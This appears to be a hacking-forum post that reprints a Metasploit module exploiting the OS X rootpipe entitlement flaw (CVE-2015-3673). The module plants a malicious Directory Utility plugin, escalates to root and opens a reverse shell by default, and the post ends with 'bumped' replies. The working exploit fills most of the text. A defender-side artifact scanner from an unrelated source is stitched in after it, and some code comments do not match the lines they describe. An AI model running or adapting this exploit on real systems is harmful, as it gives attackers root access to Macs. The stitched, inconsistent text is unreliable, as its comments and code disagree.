
Apple OS X Entitlements Rootpipe Privilege Escalation Exploit

    Posted on 2015-8-29 19:34:34
    CVE-2015-3673

    ##
    # This module requires Metasploit: http://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##
     
    require 'msf/core'
     
    class Metasploit4 < Msf::Exploit::Local
     
      Rank = GreatRanking
     
      include Msf::Post::OSX::System
      include Msf::Exploit::EXE
      include Msf::Exploit::FileDropper
     
      def initialize(info = {})
        super(update_info(info,
          'Name'           => 'Apple OS X Entitlements Rootpipe Privilege Escalation',
          'Description'    => %q{
            This module exploits the rootpipe vulnerability and bypasses Apple's initial
            fix for the issue by injecting code into a process with the 'admin.writeconfig'
            entitlement.
          },
          'Author'         => [
            'Emil Kvarnhammar', # Vulnerability discovery and PoC
            'joev'              # Copy/paste monkey
          ],
          'References'     => [
            ['CVE',   '2015-3673'],
            ['URL',   'https://truesecdev.wordpress.com/2015/07/01/exploiting-rootpipe-again/']
          ],
          'DisclosureDate' => 'Jul 1 2015',
          'License'        => MSF_LICENSE,
          'Platform'       => 'osx',
          'Arch'           => ARCH_X86_64,
          'SessionTypes'   => ['shell'],
          'Privileged'     => true,
          'Targets'        => [
            ['Mac OS X 10.9-10.10.3', {}]
          ],
          'DefaultTarget'  => 0,
          'DefaultOptions' => {
            'PAYLOAD'         => 'osx/x64/shell_reverse_tcp',
            'PrependSetreuid' => true
          }
        ))
     
        register_options([
          OptString.new('WRITABLEDIR', [true, 'Writable directory', '/.Trashes'])
        ])
      end
     
      def check
        if ver? && admin?
          vprint_status("Version is between 10.9 and 10.10.3, and is admin.")
          return Exploit::CheckCode::Vulnerable
        else
          return Exploit::CheckCode::Safe
        end
      end
     
      def exploit
        print_status("Copying Directory Utility.app to #{new_app}")
        cmd_exec("cp -R '/System/Library/CoreServices/Applications/Directory Utility.app' '#{new_app}'")
        cmd_exec("mkdir -p '#{new_app}/Contents/PlugIns/RootpipeBundle.daplug/Contents/MacOS'")
     
        print_status("Writing bundle plist to `#{plist_file}'")
        write_file(plist_file, plist)
     
        print_status("Writing payload to `#{payload_file}'")
        write_file(payload_file, binary_payload)
        register_file_for_cleanup(payload_file)
     
        print_status("Writing malicious shared library to `#{exploit_file}'")
        write_file(exploit_file, plugin_exploit)
     
        print_status("Running Directory Utility.app")
        cmd_exec("/bin/sh -c 'PAYLOAD_IN="+payload_file+" PAYLOAD_OUT="+root_file+" #{new_app}/Contents/MacOS/Directory\\ Utility'")
     
        print_status("Deleting Directory Utility.app")
        # Double-quoted so that #{new_app} is interpolated; the single-quoted
        # form ran `rm -Rf "#{new_app}"` literally and never removed the copy.
        cmd_exec("rm -Rf '#{new_app}'")
     
        print_status('Executing payload...')
        cmd_exec("/bin/sh -c '#{root_file} &'")
      end
     
      def ver?
        Gem::Version.new(get_sysinfo['ProductVersion']).between?(
          Gem::Version.new('10.9'), Gem::Version.new('10.10.3')
        )
      end
     
      def admin?
        cmd_exec('groups | grep -wq admin && echo true') == 'true'
      end
     
      # Unused leftover from an earlier revision: PYTHON is not a registered
      # option and nothing in this module calls sploit.
      def sploit
        "#{datastore['PYTHON']} #{exploit_file} #{payload_file} #{payload_file}"
      end
     
      def plugin_exploit
        File.read(File.join(
          Msf::Config.data_directory, 'exploits', 'CVE-2015-3673', 'exploit.daplug'
        ))
      end
     
      def binary_payload
        Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)
      end
     
      def exploit_file
        "#{new_app}/Contents/PlugIns/RootpipeBundle.daplug/Contents/MacOS/RootpipeBundle"
      end
     
      def plist_file
        "#{new_app}/Contents/PlugIns/RootpipeBundle.daplug/Contents/Info.plist"
      end
     
      def new_app
        @app ||= "#{datastore['WRITABLEDIR']}/#{Rex::Text.rand_text_alpha(8)}.app"
      end
     
      def plist
        %Q|
          <?xml version="1.0" encoding="UTF-8"?>
          <plist version="1.0">
          <dict>
            <key>CFBundleGetInfoString</key>
            <string>RootpipeBundle</string>
            <key>CFBundleExecutable</key>
            <string>RootpipeBundle</string>
            <key>CFBundleIdentifier</key>
            <string>com.root.pipe</string>
            <key>CFBundleName</key>
            <string>RootpipeBundle</string>
            <key>CFBundleShortVersionString</key>
            <string>0.01</string>
            <key>CFBundleInfoDictionaryVersion</key>
            <string>6.0</string>
            <key>CFBundlePackageType</key>
            <string>APPL</string>
            <key>IFMajorVersion</key>
            <integer>0</integer>
            <key>IFMinorVersion</key>
            <integer>1</integer>
          </dict>
          </plist>
        |
      end
     
      def payload_file
        @payload_file ||=
          "#{datastore['WRITABLEDIR']}/#{Rex::Text.rand_text_alpha(8)}"
      end
     
      def root_file
        @root_file ||=
          "#{datastore['WRITABLEDIR']}/#{Rex::Text.rand_text_alpha(8)}"
      end
    end
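A defender-side check for the on-disk artifacts of this technique, added here as an example and not part of the original post or of the Metasploit module: it walks a directory tree and flags copies of Directory Utility.app outside /System and .daplug bundles whose CFBundleIdentifier is not Apple's. The sample tree, the file names and the com.apple.* heuristic are constructed assumptions for illustration.

```ruby
# Added example, not part of the original post or of the Metasploit module:
# a defender-side check for the on-disk artifacts of this technique. The
# module copies the entitled "Directory Utility.app" out of /System into a
# writable directory and adds a non-Apple ".daplug" bundle to its PlugIns.
require 'find'
require 'fileutils'
require 'tmpdir'

SYSTEM_APP = '/System/Library/CoreServices/Applications/Directory Utility.app'

# Walks +root+ and returns finding strings for suspicious .app bundles.
def scan_for_rootpipe_artifacts(root)
  findings = []
  Find.find(root) do |path|
    next unless File.directory?(path) && path.end_with?('.app')
    main_bin = File.join(path, 'Contents', 'MacOS', 'Directory Utility')
    # A Directory Utility binary outside its System location is a copied bundle.
    if File.file?(main_bin) && !path.start_with?(SYSTEM_APP)
      findings << "copied Directory Utility bundle: #{path}"
    end
    Dir.glob(File.join(path, 'Contents', 'PlugIns', '*.daplug')).each do |plug|
      info = File.join(plug, 'Contents', 'Info.plist')
      next unless File.file?(info)
      ident = File.read(info)[%r{<key>CFBundleIdentifier</key>\s*<string>([^<]*)</string>}, 1]
      # Assumption: Apple's own plugins use com.apple.* identifiers; anything else is foreign.
      next if ident.to_s.start_with?('com.apple.')
      findings << "foreign daplug #{ident.inspect} in #{plug}"
    end
  end
  findings
end

# Constructed sample tree mirroring what the module writes (empty files, no binaries),
# plus a benign app whose plugin carries an Apple identifier and must not be flagged.
def build_sample_tree(root)
  app = File.join(root, '.Trashes', 'abcdefgh.app')
  FileUtils.mkdir_p(File.join(app, 'Contents', 'MacOS'))
  FileUtils.touch(File.join(app, 'Contents', 'MacOS', 'Directory Utility'))
  plug = File.join(app, 'Contents', 'PlugIns', 'RootpipeBundle.daplug', 'Contents')
  FileUtils.mkdir_p(plug)
  File.write(File.join(plug, 'Info.plist'), "<dict>\n<key>CFBundleIdentifier</key>\n<string>com.root.pipe</string>\n</dict>")
  ok = File.join(root, 'Applications', 'Benign.app', 'Contents', 'PlugIns', 'Good.daplug', 'Contents')
  FileUtils.mkdir_p(ok)
  File.write(File.join(ok, 'Info.plist'), "<dict><key>CFBundleIdentifier</key><string>com.apple.good</string></dict>")
  app
end

Dir.mktmpdir { |tmp| build_sample_tree(tmp); puts scan_for_rootpipe_artifacts(tmp) }
```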

    Posted on 2015-8-30 12:26:41
    Still pretty good, bumped.

    Posted on 2015-8-30 16:43:48
    Support the China Honker Union (ihonker.org)

    Posted on 2015-8-31 08:24:14
    Still pretty good, bumped.

    Posted on 2015-8-31 22:32:37

    Posted on 2015-9-1 00:08:11
    Support, this looks good!

    Posted on 2015-9-1 02:13:14
    Support, this looks good!

    Posted on 2015-9-1 16:00:17

    Posted on 2015-9-2 12:17:57
    Still pretty good, bumped.

    Posted on 2015-9-3 11:30:05